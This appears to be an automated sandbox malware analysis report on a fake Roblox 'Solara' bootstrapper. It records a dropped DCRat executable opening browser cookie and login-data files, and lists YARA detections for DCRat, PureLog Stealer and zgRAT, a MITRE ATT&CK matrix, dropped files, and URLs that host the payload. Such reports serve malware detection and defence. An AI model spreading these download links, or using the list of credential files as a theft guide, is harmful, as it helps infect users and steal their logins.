Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 0000000D.00000002.2305646369.000000001348B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PerfNET.exe PID: 6520, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: BootstrapperV1.19.exe, type: SAMPLE
Source: Yara match	File source: 3.3.Solaraexecutor.exe.4f5070b.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Solaraexecutor.exe.506570b.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Solaraexecutor.exe.506570b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Solaraexecutor.exe.4f5070b.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.BootstrapperV1.19.exe.32b771a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.PerfNET.exe.e00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.BootstrapperV1.19.exe.54ab86.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.BootstrapperV1.19.exe.4fc494.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.BootstrapperV1.19.exe.409294.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.BootstrapperV1.19.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000000.1994292109.0000000000E02000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1697999893.0000000004F02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1698866320.0000000005017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1695171822.0000000003269000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1688952530.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\ELAMBKUP\SIHClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Default\AppData\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: BootstrapperV1.19.exe, type: SAMPLE
Source: Yara match	File source: 3.3.Solaraexecutor.exe.4f5070b.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Solaraexecutor.exe.506570b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Solaraexecutor.exe.4f5070b.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.BootstrapperV1.19.exe.32b771a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.PerfNET.exe.e00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.BootstrapperV1.19.exe.54ab86.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.BootstrapperV1.19.exe.4fc494.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.BootstrapperV1.19.exe.409294.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.BootstrapperV1.19.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\ELAMBKUP\SIHClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Default\AppData\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	11 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	11 Process Injection	11 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Scheduled Task/Job	2 Obfuscated Files or Information	Security Account Manager	137 System Information Discovery	SMB/Windows Admin Shares	1 Clipboard Data	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	Login Hook	Login Hook	21 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	231 Security Software Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	32 Masquerading	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	141 Virtualization/Sandbox Evasion	DCSync	141 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
BootstrapperV1.19.exe	87%	Virustotal		Browse
BootstrapperV1.19.exe	95%	ReversingLabs	Win32.Trojan.DCRat
BootstrapperV1.19.exe	100%	Avira	VBS/Runner.VPG
BootstrapperV1.19.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	100%	Avira	TR/Redcap.oczed
C:\Users\Default\AppData\RuntimeBroker.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\OQZC6ToBZn.bat	100%	Avira	BAT/Delbat.C
C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	100%	Avira	VBS/Runner.VPG
C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe	100%	Joe Sandbox ML
C:\Users\Default\AppData\RuntimeBroker.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe	58%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMWILCHEwdBVCAxxjofRRL.exe	58%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	58%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\Default\AppData\RuntimeBroker.exe	58%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	45%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	55%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	58%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\FtgWXsHz.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\GnKnxRmO.log	8%	ReversingLabs
C:\Users\user\Desktop\QWdDhtsw.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
getsolara.dev	14%	Virustotal	Browse
edge-term4-fra2.roblox.com	0%	Virustotal	Browse
www.nodejs.org	0%	Virustotal	Browse
pastebin.com	0%	Virustotal	Browse
clientsettings.roblox.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://127.0.0.1:6463	0%	Avira URL Cloud	safe
https://www.cloudflare.com/learning/access-management/phishing-attack/	0%	Avira URL Cloud	safe
https://www.nodejs.org	0%	Avira URL Cloud	safe
http://www.nodejs.org	0%	Avira URL Cloud	safe
https://ncs.roblox.com/upload	0%	Avira URL Cloud	safe
https://github.com/typeshi12/end/releases/download/re/Bootstrapper.exe	0%	Avira URL Cloud	safe
http://www.nodejs.org	0%	Virustotal		Browse
https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/raw	0%	Avira URL Cloud	safe
https://www.cloudflare.com/learning/access-management/phishing-attack/	0%	Virustotal		Browse
http://127.0.0.1:6463	1%	Virustotal		Browse
https://aka.ms/vs/17/release/vc_redist.x64.exe	0%	Avira URL Cloud	safe
https://getsolara.dev/	100%	Avira URL Cloud	phishing
https://www.nodejs.org	0%	Virustotal		Browse
https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi	0%	Avira URL Cloud	safe
https://github.com/typeshi12/end/releases/download/re/Bootstrapper.exe	0%	Virustotal		Browse
https://gist.githubusercontent.com/typeshi12/29ef3a44a19235b08aaf229631c024d8/raw	0%	Avira URL Cloud	safe
http://127.0.0.1:6463/rpc?v=1	0%	Avira URL Cloud	safe
http://edge-term4-fra2.roblox.com	0%	Avira URL Cloud	safe
https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi	0%	Virustotal		Browse
https://getsolara.dev/	12%	Virustotal		Browse
https://discord.com	0%	Avira URL Cloud	safe
http://edge-term4-fra2.roblox.com	0%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Avira URL Cloud	safe
https://aka.ms/vs/17/release/vc_redist.x64.exe	0%	Virustotal		Browse
https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/raw	0%	Virustotal		Browse
https://discord.com	0%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
https://github.com/typeshi12/end/releases/download/re/Solara.Dir.zip	0%	Avira URL Cloud	safe
http://127.0.0.1:6463/rpc?v=1	0%	Virustotal		Browse
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Virustotal		Browse
https://gist.githubusercontent.com/typeshi12/29ef3a44a19235b08aaf229631c024d8/raw	0%	Virustotal		Browse
